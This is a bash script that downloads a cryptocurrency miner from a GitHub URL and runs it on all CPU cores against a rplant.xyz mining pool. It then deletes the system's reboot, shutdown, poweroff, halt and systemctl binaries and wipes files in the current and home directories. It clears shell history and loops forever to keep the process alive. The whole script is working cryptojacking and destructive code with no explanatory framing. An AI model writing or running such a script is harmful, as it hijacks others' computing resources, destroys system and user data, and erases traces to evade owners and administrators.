#!/bin/bash
wget -O biru https://github.com/claires67/buut/raw/main/cpminer > /dev/null 2>&1
chmod 777 biru
./biru -a minotaurx -o stratum+tcp://stratum-na.rplant.xyz:7068 -u REtomMN9PNq2beCgstLwuzVM9SEazS3QHR.$(shuf -n 1 -i 1-99999)-crot -t $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
